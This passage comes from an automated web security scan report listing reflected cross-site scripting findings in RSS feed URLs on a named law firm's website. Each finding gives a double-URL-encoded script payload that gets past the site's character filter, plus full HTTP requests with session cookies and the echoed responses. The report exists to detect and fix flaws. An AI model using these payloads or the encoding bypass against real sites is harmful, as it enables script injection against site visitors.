Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Food__Drug_and_Product_Safety/rss.xmlf92a2"><script>alert(1)</script>41efcd82b21" value="">
...[SNIP]...

2.174. http://www.wileyrein.com/rss/practices/Franchise/rss.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Franchise/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6fba%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea4316059e06 was submitted in the REST URL parameter 1. This input was echoed as a6fba"><script>alert(1)</script>a4316059e06 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rssa6fba%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea4316059e06/practices/Franchise/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rssa6fba"><script>alert(1)</script>a4316059e06/practices/Franchise/rss.xml" value="">
...[SNIP]...

2.175. http://www.wileyrein.com/rss/practices/Franchise/rss.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Franchise/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b78b0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9778950fc0 was submitted in the REST URL parameter 2. This input was echoed as b78b0"><script>alert(1)</script>9778950fc0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practicesb78b0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9778950fc0/Franchise/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practicesb78b0"><script>alert(1)</script>9778950fc0/Franchise/rss.xml" value="">
...[SNIP]...

2.176. http://www.wileyrein.com/rss/practices/Franchise/rss.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Franchise/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4984%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e61790d4d9a8 was submitted in the REST URL parameter 3. This input was echoed as d4984"><script>alert(1)</script>61790d4d9a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Franchised4984%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e61790d4d9a8/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Franchised4984"><script>alert(1)</script>61790d4d9a8/rss.xml" value="">
...[SNIP]...

2.177. http://www.wileyrein.com/rss/practices/Franchise/rss.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Franchise/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 214b4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e273c67fee0b was submitted in the REST URL parameter 4. This input was echoed as 214b4"><script>alert(1)</script>273c67fee0b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Franchise/rss.xml214b4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e273c67fee0b HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Franchise/rss.xml214b4"><script>alert(1)</script>273c67fee0b" value="">
...[SNIP]...

2.178. http://www.wileyrein.com/rss/practices/Government_Contracts/rss.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Government_Contracts/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2dde%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eed620a3a2e2 was submitted in the REST URL parameter 1. This input was echoed as f2dde"><script>alert(1)</script>ed620a3a2e2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rssf2dde%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eed620a3a2e2/practices/Government_Contracts/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rssf2dde"><script>alert(1)</script>ed620a3a2e2/practices/Government_Contracts/rss.xml" value="">
...[SNIP]...

2.179. http://www.wileyrein.com/rss/practices/Government_Contracts/rss.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Government_Contracts/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad839%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb98612c93e6 was submitted in the REST URL parameter 2. This input was echoed as ad839"><script>alert(1)</script>b98612c93e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practicesad839%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb98612c93e6/Government_Contracts/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practicesad839"><script>alert(1)</script>b98612c93e6/Government_Contracts/rss.xml" value="">
...[SNIP]...

2.180. http://www.wileyrein.com/rss/practices/Government_Contracts/rss.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Government_Contracts/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8ea8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7c519c08fc2 was submitted in the REST URL parameter 3. This input was echoed as a8ea8"><script>alert(1)</script>7c519c08fc2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Government_Contractsa8ea8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7c519c08fc2/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Government_Contractsa8ea8"><script>alert(1)</script>7c519c08fc2/rss.xml" value="">
...[SNIP]...

2.181. http://www.wileyrein.com/rss/practices/Government_Contracts/rss.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Government_Contracts/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c8b4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4f8e8ef06bb was submitted in the REST URL parameter 4. This input was echoed as 9c8b4"><script>alert(1)</script>4f8e8ef06bb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Government_Contracts/rss.xml9c8b4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4f8e8ef06bb HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Government_Contracts/rss.xml9c8b4"><script>alert(1)</script>4f8e8ef06bb" value="">
...[SNIP]...

2.182. http://www.wileyrein.com/rss/practices/Health_Care/rss.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Health_Care/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86cb4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efd584c5ec86 was submitted in the REST URL parameter 1. This input was echoed as 86cb4"><script>alert(1)</script>fd584c5ec86 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss86cb4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efd584c5ec86/practices/Health_Care/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss86cb4"><script>alert(1)</script>fd584c5ec86/practices/Health_Care/rss.xml" value="">
...[SNIP]...

2.183. http://www.wileyrein.com/rss/practices/Health_Care/rss.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Health_Care/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc67c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed7658866ddf was submitted in the REST URL parameter 2. This input was echoed as cc67c"><script>alert(1)</script>d7658866ddf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practicescc67c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed7658866ddf/Health_Care/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practicescc67c"><script>alert(1)</script>d7658866ddf/Health_Care/rss.xml" value="">
...[SNIP]...

2.184. http://www.wileyrein.com/rss/practices/Health_Care/rss.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Health_Care/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f87dc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eee3d1a37ca4 was submitted in the REST URL parameter 3. This input was echoed as f87dc"><script>alert(1)</script>ee3d1a37ca4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Health_Caref87dc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eee3d1a37ca4/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Health_Caref87dc"><script>alert(1)</script>ee3d1a37ca4/rss.xml" value="">
...[SNIP]...

2.185. http://www.wileyrein.com/rss/practices/Health_Care/rss.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Health_Care/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1cbf%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eefc92306738 was submitted in the REST URL parameter 4. This input was echoed as f1cbf"><script>alert(1)</script>efc92306738 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Health_Care/rss.xmlf1cbf%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eefc92306738 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Health_Care/rss.xmlf1cbf"><script>alert(1)</script>efc92306738" value="">
...[SNIP]...

2.186. http://www.wileyrein.com/rss/practices/Insurance/rss.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Insurance/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7953a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea4cf2c1a532 was submitted in the REST URL parameter 1. This input was echoed as 7953a"><script>alert(1)</script>a4cf2c1a532 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss7953a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea4cf2c1a532/practices/Insurance/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss7953a"><script>alert(1)</script>a4cf2c1a532/practices/Insurance/rss.xml" value="">
...[SNIP]...

2.187. http://www.wileyrein.com/rss/practices/Insurance/rss.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Insurance/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0999%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5bd9f5471e was submitted in the REST URL parameter 2. This input was echoed as a0999"><script>alert(1)</script>5bd9f5471e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practicesa0999%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5bd9f5471e/Insurance/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practicesa0999"><script>alert(1)</script>5bd9f5471e/Insurance/rss.xml" value="">
...[SNIP]...

2.188. http://www.wileyrein.com/rss/practices/Insurance/rss.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Insurance/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3861%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e021aa92fc8e was submitted in the REST URL parameter 3. This input was echoed as a3861"><script>alert(1)</script>021aa92fc8e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

